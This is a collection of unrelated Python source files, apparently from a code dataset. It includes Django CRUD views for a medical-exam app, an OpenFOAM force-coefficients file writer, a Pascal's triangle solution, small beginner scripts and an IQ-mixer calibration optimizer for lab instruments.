template_name = 'exame/edit.html'
success_url = reverse_lazy('public:exame_list')
success_message = "Exame Editado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class ExameDeleteView(SuccessMessageMixin, DeleteView):
model = Exame
template_name = 'exame/delete.html'
success_url = reverse_lazy('public:exame_list')
success_message ="O Exame %s foi apagada com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.nome_exame)  # note: previously obj.__dict__ was used, which printed the whole object
return super(ExameDeleteView, self).delete(request, *args, **kwargs)
################################################## ESPECIALIDADE MEDICA ####################################################
class EspecialidadeMedicaListView(ListView):
model = EspecialidadeMedica
template_name = 'especialidademedica/especialidademedica_list.html'
context_object_name = "especialidademedicas"
paginate_by = 5
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = EspecialidadeMedica.objects.filter(
Q(especialidade_medica__icontains=query)
)
else:
object_list = EspecialidadeMedica.objects.all()
return object_list
class EspecialidadeMedicaCreateView(SuccessMessageMixin, CreateView):
form_class = EspecialiadeMedicaForm
template_name = 'especialidademedica/create.html'
success_url = reverse_lazy('public:especialidademedica_create')
success_message = "Especialidade Medica cadastrado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class EspecialidadeMedicaDetailView(DetailView):
model = EspecialidadeMedica
template_name = 'especialidademedica/detail.html'
class EspecialidadeMedicaUpdateView(SuccessMessageMixin, UpdateView):
model = EspecialidadeMedica
form_class = EspecialiadeMedicaForm
template_name = 'especialidademedica/edit.html'
success_url = reverse_lazy('public:especialidademedica_list')
success_message = "Especialidade Medica Editado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class EspecialidadeMedicaDeleteView(SuccessMessageMixin, DeleteView):
model = EspecialidadeMedica
template_name = 'especialidademedica/delete.html'
success_url = reverse_lazy('public:especialidademedica_list')
success_message ="A Especialidade Medica %s foi apagada com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.especialidade_medica)  # note: previously obj.__dict__ was used, which printed the whole object
return super(EspecialidadeMedicaDeleteView, self).delete(request, *args, **kwargs)
################################################## PRESTADOR DE SERVIÇO ####################################################
class PrestadorServicoListView(ListView):
model = PrestadorServico
template_name = 'prestadorservico/prestadorservico_list.html'
context_object_name = "prestadorservicos"
paginate_by = 5
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = PrestadorServico.objects.filter(
Q(nome_prestador__icontains=query)
)
else:
object_list = PrestadorServico.objects.all()
return object_list
class PrestadorServicoCreateView(SuccessMessageMixin, CreateView):
form_class = PrestadorServicoForm
template_name = 'prestadorservico/create.html'
success_url = reverse_lazy('public:prestadorservico_create')
success_message = "Prestador Serviço cadastrado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class PrestadorServicoDetailView(DetailView):
model = PrestadorServico
template_name = 'prestadorservico/detail.html'
class PrestadorServicoUpdateView(SuccessMessageMixin, UpdateView):
model = PrestadorServico
form_class = PrestadorServicoForm
template_name = 'prestadorservico/edit.html'
success_url = reverse_lazy('public:prestadorservico_list')
success_message = "Prestador de Serviço Editado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class PrestadorServicoDeleteView(SuccessMessageMixin, DeleteView):
model = PrestadorServico
template_name = 'prestadorservico/delete.html'
success_url = reverse_lazy('public:prestadorservico_list')
success_message ="O Prestador de Serviço %s foi apagado com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.nome_prestador)  # note: previously obj.__dict__ was used, which printed the whole object
return super(PrestadorServicoDeleteView, self).delete(request, *args, **kwargs)
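# The form_valid overrides above all repeat the same three steps: stamp the
# auditing user id, flash the success message, then save. A hedged
# refactoring sketch (an assumption, not part of the original app) factors
# this into a mixin that each CreateView/UpdateView could use instead:
class AuditUserMixin:
    user_field = 'idusuariocadastro'  # set to 'idusuarioedicao' on update views

    def form_valid(self, form):
        self.object = form.save(commit=False)
        setattr(self.object, self.user_field, self.request.user.id)
        messages.success(self.request, self.success_message)
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())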
|
nilq/baby-python
|
python
|
nome = str(input("Qual é seu nome")).lower().strip()
if nome == "gustavo":
print("Que nome bonito")
elif nome == "pedro" or nome == "maria" or nome == "joão":
print ("O seu nome é bem popular")
elif nome == "ana katarina":
print ("que nome feio")
else:
print("Seu nome é bem chato")
|
nilq/baby-python
|
python
|
from .jsonexporter import JSONExporter
from .ymlexporter import YMLExporter
|
nilq/baby-python
|
python
|
from __future__ import absolute_import, division, print_function, unicode_literals
import math
import random
import time
from echomesh.sound import Level
from echomesh.util.registry.Registry import Registry
class _SystemFunction(object):
def __init__(self, function, is_constant):
self.function = function
self.is_constant = is_constant
_REGISTRY = Registry('System functions')
def register(name, function, is_constant):
_REGISTRY.register(_SystemFunction(function, is_constant), name)
register('e', math.e, True)
register('level', Level.input_level, False)
register('pi', math.pi, True)
register('random', random.random, False)
register('time', time.time, False)
get = _REGISTRY.get
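# Hedged usage sketch (commented out; the exact Registry.get semantics are an
# assumption based on this file): constants are registered as plain values and
# dynamic quantities as callables, so a caller branches on is_constant.
#
#     sf = get('time')
#     value = sf.function if sf.is_constant else sf.function()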
|
nilq/baby-python
|
python
|
print('=====HOW MUCH PAINT?=====')
alt = float(input('What is the wall height? '))
lar = float(input('What is the wall width? '))
area = alt*lar
print('The wall area is {:.2f}m²!'.format(area))
print('{} litres of paint will be needed to paint the wall (at 2m² per litre)'.format(area/2))
|
nilq/baby-python
|
python
|
#########################################################################
# #
# C R A N F I E L D U N I V E R S I T Y #
# 2 0 1 9 / 2 0 2 0 #
# #
# MSc in Aerospace Computational Engineering #
# #
# Group Design Project #
# #
# Driver File for the OpenFoam Automated Tool Chain #
# Flow Past Cylinder Test Case #
# #
#-----------------------------------------------------------------------#
# #
# Main Contributors: #
# Vadim Maltsev (Email: V.Maltsev@cranfield.ac.uk) #
# Samali Liyanage (Email: Samali.Liyanage@cranfield.ac.uk) #
# Elias Farah (Email: E.Farah@cranfield.ac.uk) #
# Supervisor: #
# Dr. Tom-Robin Teschner (Email: Tom.Teschner@cranfield.ac.uk ) #
# #
#########################################################################
from __future__ import division
class genForceCoeffsFile:
#parameters: Parameters specified in the main driver
#rasModel: if the simulation is turbulent then specify the RAS model
def __init__(self, parameters):
self.parameters = parameters
self.Diam = parameters['Diam']
self.U = parameters['U']
self.geometry = 'cylinder'
self.thick = parameters['thickness']
self.CofR = [10*self.Diam, 10*self.Diam, self.thick/2]
self.lRef = self.Diam
if parameters["topology"] == "2D":
self.Aref = self.Diam * 0.5
elif parameters["topology"] == "3D":
self.Aref = self.Diam * self.thick
self.liftDir = [0, 1, 0]
self.dragDir = [1, 0, 0]
self.pitchAxis = [0, 0, 1]
def writeForceCoeffsFile(self):
forceCoeffsFile = open("forceCoeffs", "w")
forceCoeffsFile.write("/*--------------------------------*-C++-*------------------------------*\\")
forceCoeffsFile.write("\n| ========== | |")
forceCoeffsFile.write("\n| \\\\ / F ield | OpenFoam: The Open Source CFD Tooolbox |")
forceCoeffsFile.write("\n| \\\\ / O peration | Version: check the installation |")
forceCoeffsFile.write("\n| \\\\ / A nd | Website: www.openfoam.com |")
forceCoeffsFile.write("\n| \\\\/ M anipulation | |")
forceCoeffsFile.write("\n\\*---------------------------------------------------------------------*/")
forceCoeffsFile.write("\n\nforceCoeffs1")
forceCoeffsFile.write("\n{")
forceCoeffsFile.write("\n type forceCoeffs;")
forceCoeffsFile.write('\n libs ("libforces.so");')
forceCoeffsFile.write("\n writeControl timeStep;")
forceCoeffsFile.write("\n timeInterval 1;")
forceCoeffsFile.write("\n log yes;")
forceCoeffsFile.write("\n pRef 0;")
forceCoeffsFile.write("\n patches (" + self.geometry + ");")
forceCoeffsFile.write("\n rho rhoInf;")
forceCoeffsFile.write("\n rhoInf "+ str(self.parameters['rho']) +";")
forceCoeffsFile.write("\n liftDir (" + str(self.liftDir[0]) + " " + str(self.liftDir[1]) + " " + str(self.liftDir[2]) + ");")
forceCoeffsFile.write("\n dragDir (" + str(self.dragDir[0]) + " " + str(self.dragDir[1]) + " " + str(self.dragDir[2]) + ");")
forceCoeffsFile.write("\n CofR (" + str(self.CofR[0]) + " " + str(self.CofR[1]) + " " + str(self.CofR[2]) + ");")
forceCoeffsFile.write("\n pitchAxis (" + str(self.pitchAxis[0]) + " " + str(self.pitchAxis[1]) + " " + str(self.pitchAxis[2]) + ");")
forceCoeffsFile.write("\n magUInf "+ str(self.U) + ";")
forceCoeffsFile.write("\n lRef " + str(self.Diam) + ";")
forceCoeffsFile.write("\n Aref " + str(self.Aref) + ";")
forceCoeffsFile.write("\n /*binData")
forceCoeffsFile.write("\n {")
forceCoeffsFile.write("\n nBin 20;")
forceCoeffsFile.write("\n direction (1 0 0);")
forceCoeffsFile.write("\n cumulative yes;")
forceCoeffsFile.write("\n }*/")
forceCoeffsFile.write("\n}")
forceCoeffsFile.write("\n\npressureCoeff1")
forceCoeffsFile.write("\n{")
forceCoeffsFile.write("\n type pressure;")
forceCoeffsFile.write('\n libs ("libfieldFunctionObjects.so");')
forceCoeffsFile.write("\n writeControl writeTime;")
forceCoeffsFile.write("\n timeInterval " + str(self.parameters['writeInterval'] )+ ";")
forceCoeffsFile.write("\n log yes;")
forceCoeffsFile.write("\n patch (" + str(self.geometry) + ");")
forceCoeffsFile.write("\n rhoInf " + str(self.parameters['rho']) +";")
forceCoeffsFile.write("\n mode totalCoeff;")
forceCoeffsFile.write("\n pRef 0;")
forceCoeffsFile.write("\n pInf 0;")
forceCoeffsFile.write("\n UInf ("+ str(self.U) + " 0 0);")
forceCoeffsFile.write("\n}")
forceCoeffsFile.write("\n\n// ******************************************************************* //")
|
nilq/baby-python
|
python
|
# https://leetcode.com/problems/pascals-triangle/
class Solution(object):
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
if numRows == 0:
return []
if numRows == 1:
return [[1]]
if numRows == 2:
return [[1], [1, 1]]
res = [[1], [1, 1]]
for i in range(2, numRows):
temp = [1]
for j in range(1, i):
temp.append(res[i-1][j-1] + res[i-1][j])
temp.append(1)
res.append(temp)
return res
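# Quick self-check of the recurrence res[i][j] = res[i-1][j-1] + res[i-1][j]:
if __name__ == '__main__':
    assert Solution().generate(5) == [[1], [1, 1], [1, 2, 1], [1, 3, 3, 1], [1, 4, 6, 4, 1]]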
|
nilq/baby-python
|
python
|
from .c2_server import C2Server
from .malware import Malware
from .actor import Actor
from .family import Family
|
nilq/baby-python
|
python
|
import numpy as np
import itertools as it
import pylabnet.hardware.spectrum_analyzer.agilent_e4405B as sa_hardware
import time
import pandas as pd
import seaborn as sns
import matplotlib
import matplotlib.pyplot as plt
from IPython.display import clear_output, display
class Optimizer:
def __init__(self):
pass
class IQOptimizer(Optimizer):
def __init__(
self, mw_source, hd, sa, carrier, signal_freq, max_iterations=5, max_lower_sideband_pow=-58, max_carrier_pow=-58, num_points=25, cushion_param=5,
param_guess=([60, 0.6, 0.65, -0.002, 0.006]), phase_window=44, q_window=0.34, dc_i_window=0.0135,
dc_q_window=0.0115, plot_traces=True, awg_delay_time=0.0, averages=1, min_rounds=1, HDAWG_ports=[3, 4],
oscillator=2):
""" Instantiate IQ optimizer
:param mw_source: instance of HMC_T2220 client
:param hd: instance of AWG client
:param sa: instance of spectrum analyzer client
:param carrier: desired carrier frequency (in Hz)
:param signal_freq: desired signal frequency (in Hz)
:kwarg num_points: number of points for scan window
:kwarg plot_traces: user decides if displaying power vs. frequency plots is desired
:kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband
:kwarg max_lower_sideband_pow: desired upper bound for lower sideband power (in dBm)
:kwarg max_carrier_pow: desired upper bound for carrier power (in dBm)
:kwarg cushion_param: positive real number positively correlated with speed of zooming in on minimum
:kwarg param_guess: starting parameters for optimization:
([phase shift, q := (amp_i/amp_q) amplitude imbalance, a0 := (amp_i+amp_q)/2 average amplitude, dc_offset_i, dc_offset_q])
:kwarg phase_window: size of initial phase scan (in degrees)
:kwarg q_window: size of initial amplitude imbalance scan window (unitless)
:kwarg dc_i_window: size of initial dc i offset scan window (in V)
:kwarg dc_q_window: size of initial dc q offset scan window (in V)
"""
# Configure hd settings
# Assign oscillator 1 to sine output 2
#hd.seti('sines/1/oscselect', 1)
# Set carrier frequency
hd.setd('oscs/{}/freq'.format(oscillator - 1), signal_freq)
# Set I and Q amplitude, calculate from q and a0 in the param_guess array
hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 2 * param_guess[2] * (param_guess[1] / (1 + param_guess[1])))
hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 2 * param_guess[2] * (1 / (1 + param_guess[1])))
# Set phase offset between I and Q
hd.setd('sines/{}/phaseshift'.format(HDAWG_ports[0] - 1), param_guess[0])
# Enable sine waves
hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 1)
hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 1)
self.mw_source = mw_source
self.hd = hd
self.sa = sa
self.carrier = carrier
self.signal_freq = signal_freq
self.num_points = num_points
self.max_iterations = max_iterations
self.plot_traces = plot_traces
self.cushion_param = cushion_param
self.HDAWG_ports = HDAWG_ports
#Set mw freq
self.mw_source.output_on()
self.mw_source.set_freq(self.carrier)
#Instantiate IQ Optimizer sweep window
self.phase_min = param_guess[0] - phase_window / 2
self.phase_max = param_guess[0] + phase_window / 2
self.q_min = param_guess[1] - q_window / 2
self.q_max = param_guess[1] + q_window / 2
self.a0 = param_guess[2]
self.dc_min_i = param_guess[3] - dc_i_window / 2
self.dc_max_i = param_guess[3] + dc_i_window / 2
self.dc_min_q = param_guess[4] - dc_q_window / 2
self.dc_max_q = param_guess[4] + dc_q_window / 2
# Instantiate params we will optimize
self.opt_phase = None
self.opt_q = None
self.amp_q_opt = None
self.amp_i_opt = None
self.dc_offset_i_opt = None
self.dc_offset_q_opt = None
# Instantiate arrays and bounds
self.phases = np.linspace(self.phase_min, self.phase_max, self.num_points)
self.qs = np.linspace(self.q_min, self.q_max, self.num_points)
self.lower_sideband_power = np.zeros((self.num_points, self.num_points))
self.opt_lower_sideband_pow = float("inf")
self.opt_carrier_pow = float("inf")
self.max_lower_sideband_pow = max_lower_sideband_pow
self.max_carrier_pow = max_carrier_pow
# Instantiate and set markers
self.upp_sb_marker = None
self.lower_sb_marker = None
self.carrier_marker = None
self.set_markers()
self._AWG_DELAY_TIME = awg_delay_time
self._averages = averages
self._min_rounds = min_rounds
def set_markers(self):
# Configure hd to enable outputs
# self.hd.enable_output(0)
# self.hd.enable_output(1)
# Center frequency at carrier frequency
self.sa.set_center_frequency(self.carrier + self.signal_freq)
self.sa.set_frequency_span(6 * self.signal_freq)
# Marker for upper sideband.
self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1)
self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2)
self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3)
# define target frequencies
markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker]
target_freqs = np.array([self.carrier + self.signal_freq, self.carrier - self.signal_freq, self.carrier])
max_deviation = 1e6
for marker, target_freq in zip(markers, target_freqs):
time.sleep(1)
marker.set_freq(target_freq)
#assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequency: {marker_freq / 1e9} GHz"
self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dBm.")
#Set reference level to just above the height of our signal to minimize our noise floor
self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2)
if self.plot_traces == True:
self.sa.plot_trace()
def opt_lower_sideband(self):
# Rough sweep
self._sweep_phase_amp_imbalance()
self._set_optimal_vals()
# Instantiate local variables for the loop
q_max2 = self.q_max
q_min2 = self.q_min
phase_max2 = self.phase_max
phase_min2 = self.phase_min
num_iterations = 0
while (self.opt_lower_sideband_pow > self.max_lower_sideband_pow or num_iterations < self._min_rounds) and num_iterations < self.max_iterations - 1:
q_cushion = np.abs(q_max2 - q_min2) / self.cushion_param
phase_cushion = np.abs(phase_max2 - phase_min2) / self.cushion_param
# Reset sweep window to zoom in on minimum
q_max2 = self.opt_q + q_cushion
q_min2 = self.opt_q - q_cushion
phase_max2 = self.opt_phase + phase_cushion
phase_min2 = self.opt_phase - phase_cushion
# Instantiate variables
self.phases = np.linspace(phase_min2, phase_max2, self.num_points)
self.qs = np.linspace(q_min2, q_max2, self.num_points)
self.lower_sideband_power = np.zeros((self.num_points, self.num_points))
self._sweep_phase_amp_imbalance()
self._set_optimal_vals()
num_iterations = num_iterations + 1
if num_iterations < self.max_iterations:
self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations + 1) + ' iterations')
else:
self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations + 1) + ' iterations')
time.sleep(1)
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
if self.plot_traces == True:
# Heatmap plot
lower_sideband_data = pd.DataFrame(self.lower_sideband_power,
index=np.round(self.phases, 1),
columns=np.round(self.qs, 2))
fig1, ax1 = plt.subplots(figsize=(8, 5))
ax1 = sns.heatmap(lower_sideband_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'lower sideband power [dBm]'})
ax1.set(ylabel='Phase shift', xlabel='Amplitude imbalance')
# Frequency plot
self.sa.plot_trace()
def opt_carrier(self):
num_iterations = 0
# If carrier power already below threshold, no need to optimize carrier
skipped = True
if self.carrier_marker.get_power() > (self.max_carrier_pow - 10):
skipped = False
# Sweep 2D parameter space of DC offsets and record carrier power
voltages_i = np.linspace(self.dc_min_i, self.dc_max_i, self.num_points)
voltages_q = np.linspace(self.dc_min_q, self.dc_max_q, self.num_points)
carrier_power = np.zeros((self.num_points, self.num_points))
self.opt_carrier_pow = self.carrier_marker.get_power()
dc_max_i2 = self.dc_max_i
dc_min_i2 = self.dc_min_i
dc_max_q2 = self.dc_max_q
dc_min_q2 = self.dc_min_q
while (self.opt_carrier_pow > self.max_carrier_pow or num_iterations < self._min_rounds) and num_iterations < self.max_iterations:
carrier_power, voltages_i, voltages_q = self._sweep_dc_offsets(voltages_i, voltages_q, carrier_power)
# Retrieve optimal DC offsets
self.dc_offset_i_opt = voltages_i[np.where(carrier_power == np.amin(carrier_power))[0][0]]
self.dc_offset_q_opt = voltages_q[np.where(carrier_power == np.amin(carrier_power))[1][0]]
self.opt_carrier_pow = np.amin(carrier_power)
i_cushion = np.abs(dc_max_i2 - dc_min_i2) / self.cushion_param
q_cushion = np.abs(dc_max_q2 - dc_min_q2) / self.cushion_param
# Reset sweep window to zoom in on minimum
dc_max_i2 = self.dc_offset_i_opt + i_cushion
dc_min_i2 = self.dc_offset_i_opt - i_cushion
dc_max_q2 = self.dc_offset_q_opt + q_cushion
dc_min_q2 = self.dc_offset_q_opt - q_cushion
# Reinstantiate variables
voltages_i = np.linspace(dc_min_i2, dc_max_i2, self.num_points)
voltages_q = np.linspace(dc_min_q2, dc_max_q2, self.num_points)
num_iterations = num_iterations + 1
# Set optimal offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), self.dc_offset_i_opt)
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), self.dc_offset_q_opt)
time.sleep(1)
else:
print('Skipped Carrier')
self.dc_offset_i_opt = self.hd.getd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1))
self.dc_offset_q_opt = self.hd.getd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1))
if num_iterations < self.max_iterations:
self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations')
else:
self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations')
time.sleep(1)
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')
if self.plot_traces == True and not skipped:
# Heatmap plot
dc_sweep_data = pd.DataFrame(carrier_power, columns=np.round(voltages_q / 1e-3, 1), index=np.round(voltages_i / 1e-3, 1))
fig, ax = plt.subplots(figsize=(8, 5))
ax = sns.heatmap(dc_sweep_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'carrier power [dBm]'})
ax.set(xlabel='DC offset Q signal [mV]', ylabel='DC offset I signal [mV]')
# Frequency plot
self.sa.plot_trace()
def opt(self):
self.opt_lower_sideband()
self.opt_carrier()
time.sleep(1)
self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(.5 * (self.amp_q_opt + self.amp_i_opt)) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])')
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')
def _sweep_phase_amp_imbalance(self):
for i, j in it.product(range(self.num_points), repeat=2):
phase = self.phases[i]
q = self.qs[j]
# Calculate i and q amplitudes from q and a0
amp_i = 2 * q / (1 + q) * self.a0
amp_q = 2 * self.a0 / (1 + q)
# Set i and q amplitudes
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), amp_i)
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), amp_q)
# Set phaseshift
self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), phase)
#See sweep dc for explanation, basically allowing the point to update
if (i == 0 and j == 0):
time.sleep(1)
if (j == 0):
time.sleep(0.1)
else:
time.sleep(self._AWG_DELAY_TIME)
# Read lower sideband power
self.lower_sideband_power[i, j] = self._average_marker_power(self.lower_sb_marker)
def _average_marker_power(self, marker):
total_sum = 0
for i in range(self._averages):
total_sum = total_sum + marker.get_power()
return total_sum / self._averages
def _set_optimal_vals(self):
self.opt_phase = self.phases[np.where(self.lower_sideband_power == np.amin(self.lower_sideband_power))[0][0]]
self.opt_q = self.qs[np.where(self.lower_sideband_power == np.amin(self.lower_sideband_power))[1][0]]
self.opt_lower_sideband_pow = np.amin(self.lower_sideband_power)
self.amp_i_opt = 2 * self.opt_q / (1 + self.opt_q) * self.a0
self.amp_q_opt = 2 * self.a0 / (1 + self.opt_q)
# Set optimal I and Q amplitudes
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), self.amp_i_opt)
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), self.amp_q_opt)
# Set optimal phaseshift
self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), self.opt_phase)
def _sweep_dc_offsets(self, voltages_i, voltages_q, carrier_power):
for i, j in it.product(range(self.num_points), repeat=2):
# Set I DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), voltages_i[i])
# Set Q DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), voltages_q[j])
# Found a bug where the first few points in the matrix seem to be from the point before,
# i.e. the script is running faster than the spectrum analyzer can update.
# So we first set the offsets to the initial voltage and wait a bit for the
# spectrum analyzer to update.
if (i == 0 and j == 0):
time.sleep(1)
#Otherwise just a generic small delay which we empirically have found to work
if (j == 0):
time.sleep(0.1)
else:
time.sleep(self._AWG_DELAY_TIME)
# Read carrier power
carrier_power[i, j] = self._average_marker_power(self.carrier_marker)
return carrier_power, voltages_i, voltages_q
def plot_dc_offsets_sweep(self, dc_min_i, dc_max_i, dc_min_q, dc_max_q, num_points):
voltages_i = np.linspace(dc_min_i, dc_max_i, num_points)
voltages_q = np.linspace(dc_min_q, dc_max_q, num_points)
carrier_power = np.zeros((num_points, num_points))
dc_max_i2 = self.dc_max_i
dc_min_i2 = self.dc_min_i
dc_max_q2 = self.dc_max_q
dc_min_q2 = self.dc_min_q
carrier_power, voltages_i, voltages_q = self._sweep_dc_offsets(voltages_i, voltages_q, carrier_power)
dc_sweep_data = pd.DataFrame(carrier_power, columns=np.round(voltages_q / 1e-3, 1), index=np.round(voltages_i / 1e-3, 1))
fig, ax = plt.subplots(figsize=(8, 5))
ax = sns.heatmap(dc_sweep_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'carrier power [dBm]'})
ax.set(xlabel='DC offset Q signal [mV]', ylabel='DC offset I signal [mV]')
def plot_phase_amp_sweep(self, phase_min, phase_max, q_min, q_max, num_points):
self.phases = np.linspace(phase_min, phase_max, num_points)
self.qs = np.linspace(q_min, q_max, num_points)
self.lower_sideband_power = np.zeros((num_points, num_points))
self._sweep_phase_amp_imbalance()
lower_sideband_data = pd.DataFrame(self.lower_sideband_power,
index=np.round(self.phases, 1),
columns=np.round(self.qs, 2))
fig1, ax1 = plt.subplots(figsize=(8, 5))
ax1 = sns.heatmap(lower_sideband_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'lower sideband power [dBm]'})
ax1.set(ylabel='Phase shift', xlabel='Amplitude imbalance')
class IQOptimizer_GD(Optimizer):
def __init__(
self, mw_source, hd, sa, carrier, signal_freq, max_iterations=20, min_power=-65,
param_guess=([70, 0.975, 0.65, 0.05, -0.02]), phase_step=5, q_step=0.05, vi_step=0.005, vq_step=0.005,
plot_traces=True, awg_delay_time=0.1, averages=10, HDAWG_ports=[3, 4],
oscillator=2):
""" Instantiate IQ optimizer
:param mw_source: instance of microwave source client
:param hd: instance of AWG client
:param sa: instance of spectrum analyzer client
:param carrier: desired carrier frequency (in Hz)
:param signal_freq: desired signal frequency (in Hz)
:kwarg plot_traces: user decides if displaying power vs. iteration plots is desired
:kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband
:kwarg min_power: noise floor (in dBm)
:kwarg param_guess: starting parameters for optimization:
([phase shift, q := (amp_i/amp_q) amplitude imbalance, a0 := (amp_i+amp_q)/2 average amplitude, dc_offset_i, dc_offset_q])
:kwarg phase_step: step size for phase parameter in gradient descent
:kwarg q_step: step size for amplitude imbalance parameter in gradient descent
:kwarg vi_step: step size for dc I offset parameter in gradient descent
:kwarg vq_step: step size for dc Q parameter in gradient descent
:kwarg awg_delay_time: time to wait after setting awg parameters
:kwarg averages: number of measurements averaged for a single power reading
:kwarg HDAWG_ports: which wave ports to use on the HDAWG
:kwarg oscillator: which oscillator to use on the HDAWG
"""
# Configure hd settings
# Assign oscillator 1 to sine output 2
#hd.seti('sines/1/oscselect', 1)
# Set carrier frequency
hd.setd('oscs/{}/freq'.format(oscillator - 1), signal_freq)
# Set I and Q amplitude, calculate from q and a0 in the param_guess array
hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 2 * param_guess[2] * (param_guess[1] / (1 + param_guess[1])))
hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 2 * param_guess[2] * (1 / (1 + param_guess[1])))
# Set phase offset between I and Q
hd.setd('sines/{}/phaseshift'.format(HDAWG_ports[0] - 1), param_guess[0])
# Enable sine waves
hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 1)
hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 1)
# set DC offsets
hd.setd('sigouts/{}/offset'.format(HDAWG_ports[0] - 1), param_guess[3])
hd.setd('sigouts/{}/offset'.format(HDAWG_ports[1] - 1), param_guess[4])
self.mw_source = mw_source
self.hd = hd
self.sa = sa
self.carrier = carrier
self.signal_freq = signal_freq
self.max_iterations = max_iterations
self.plot_traces = plot_traces
self.min_power = min_power
self.HDAWG_ports = HDAWG_ports
#Set mw freq
self.mw_source.output_on()
self.mw_source.set_freq(self.carrier)
#Instantiate step sizes
self.phase_step = phase_step
self.q_step = q_step
self.vi_step = vi_step
self.vq_step = vq_step
#Instantiate initial guesses
self.phase_guess = param_guess[0]
self.q_guess = param_guess[1]
self.a0 = param_guess[2]
self.dc_i_guess = param_guess[3]
self.dc_q_guess = param_guess[4]
# Instantiate params we will optimize
self.opt_phase = None
self.opt_q = None
self.amp_q_opt = None
self.amp_i_opt = None
self.dc_offset_i_opt = None
self.dc_offset_q_opt = None
# Instantiate arrays and bounds
self.opt_lower_sideband_pow = float("inf")
self.opt_carrier_pow = float("inf")
